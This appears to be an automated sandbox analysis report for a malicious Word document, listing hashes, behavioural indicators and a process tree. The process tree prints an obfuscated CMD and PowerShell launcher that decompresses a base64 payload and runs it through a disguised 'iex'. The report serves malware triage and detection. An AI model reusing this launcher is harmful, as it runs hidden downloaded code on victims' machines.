Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-09-2024 07:53
Behavioral task
behavioral1
Sample
e8a69d43cb32354bd852c5ab9c071abe_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e8a69d43cb32354bd852c5ab9c071abe_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
e8a69d43cb32354bd852c5ab9c071abe_JaffaCakes118.doc
-
Size
84KB
-
MD5
e8a69d43cb32354bd852c5ab9c071abe
-
SHA1
11c101fc170253637726e5d1117a86dd2a2d9401
-
SHA256
51cd6bdb18da6dc94549e067b04e727b9e947f2f189f5c27da67eb56f77c5f54
-
SHA512
796c5403741abeacc76247f52a872d2b11aba408493a16263a10a99d9fff9111c8a9610dfbd9ece011dc60bd922a453259487d60bbf0e2a0f2f9b45ed08d2900
-
SSDEEP
1536:c5ocn1kp59gxBK85fBt+a9AgIsTy4Ceh:B41k/W48jIt4CW
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2068 3000 CMD.exe 29 -
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2744 powershell.exe 7 2744 powershell.exe -
pid Process 2744 powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3000 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2744 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2744 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3000 WINWORD.EXE 3000 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3000 wrote to memory of 2508 3000 WINWORD.EXE 30 PID 3000 wrote to memory of 2508 3000 WINWORD.EXE 30 PID 3000 wrote to memory of 2508 3000 WINWORD.EXE 30 PID 3000 wrote to memory of 2508 3000 WINWORD.EXE 30 PID 3000 wrote to memory of 2068 3000 WINWORD.EXE 31 PID 3000 wrote to memory of 2068 3000 WINWORD.EXE 31 PID 3000 wrote to memory of 2068 3000 WINWORD.EXE 31 PID 3000 wrote to memory of 2068 3000 WINWORD.EXE 31 PID 2068 wrote to memory of 2744 2068 CMD.exe 34 PID 2068 wrote to memory of 2744 2068 CMD.exe 34 PID 2068 wrote to memory of 2744 2068 CMD.exe 34 PID 2068 wrote to memory of 2744 2068 CMD.exe 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e8a69d43cb32354bd852c5ab9c071abe_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2508
-
-
C:\Windows\SysWOW64\CMD.exeCMD c:\wINdows\SYsTeM32\CmD.EXe /C "SeT OxnHJ= ^& ((GV '*MDr*').nAme[3,11,2]-joiN'') ( NEW-oBjEcT Io.sTReaMReadeR((NEW-oBjEcT Io.cOMPresSIon.dEFLaTESTreAm([iO.mEmoRYSTREam] [syStEm.conVeRt]::FroMBasE64StriNG( 'TZDBSsNAEIZfJYeFbYnZ1ApGugSKitCDFqzoxctmO+2m3czGzdBNW/LupkHF6/8N38z8bLeqcoSQuGIHmqIXIPEBxYMtAUmy3drm3BDVszQlCy15qEBoV6XON8vjaf7DDgoNeA8BtgZQFJAuflEIQWhVAZaNNknjNhSU7x0mPaJ9+zM0Zjq5zvpYoYZqT8OS9+0k+++hE+B0IKFOtEPqj0zv2lcuVrUtacTnfCyZL5+jPOLZzS2X7Gt5nzPAw4ygqmP+yeMLj7mAFrjcOA9KmxFDr6MSo8vD4zP545n1xYhHF9A6tX4qLQwzV9FFOJYLPLg9JIteOiSy6D172WlF2py77hs=' ),[Io.CoMpResSioN.ComPreSSIONMoDE]::DECompreSs)),[sYsTeM.tEXT.encODiNG]::ascii) ).rEADtoeNd( ) &&PoWeRSHElL sET-IteM vAriAbLe:j1R9x ( [Type](\"{0}{1}{3}{2}\"-F 'EN','viR','ENt','ONM' )) ; ( ( geT-VaRIABlE J1r9X ).vAlUE::( \"{0}{5}{2}{3}{6}{4}{1}\" -f 'get','abLE','i','RONm','tVari','ENv','EN' ).Invoke( ( \"{1}{0}\" -f 'xnhJ','O' ),( \"{0}{1}\"-f 'Pr','oCEss') ) ) ^| ^& ( ${sH`eLl`Id}[1] + ${shE`L`LId}[13]+ 'x' )"2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWeRSHElL sET-IteM vAriAbLe:j1R9x ( [Type](\"{0}{1}{3}{2}\"-F 'EN','viR','ENt','ONM' )) ; ( ( geT-VaRIABlE J1r9X ).vAlUE::( \"{0}{5}{2}{3}{6}{4}{1}\" -f 'get','abLE','i','RONm','tVari','ENv','EN' ).Invoke( ( \"{1}{0}\" -f 'xnhJ','O' ),( \"{0}{1}\"-f 'Pr','oCEss') ) ) | & ( ${sH`eLl`Id}[1] + ${shE`L`LId}[13]+ 'x' )3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5c842571d34c7f73c3e2e67ec2bc6eea9
SHA14ce33673aa57c34d5bc95fd32a7615c367697f08
SHA256bfdf4bd71942eb5cca0a87c6d3b27050a3f256a70fac63aa4103482648025157
SHA5128ebd12f162e486a257dfc5c79992eff708848336a59cc3dab9aa70e54ec75de7bd3e8b9a6cf48843a6f478f435cf78e36c150f5a0b8b44e36c2c2d294fc92f19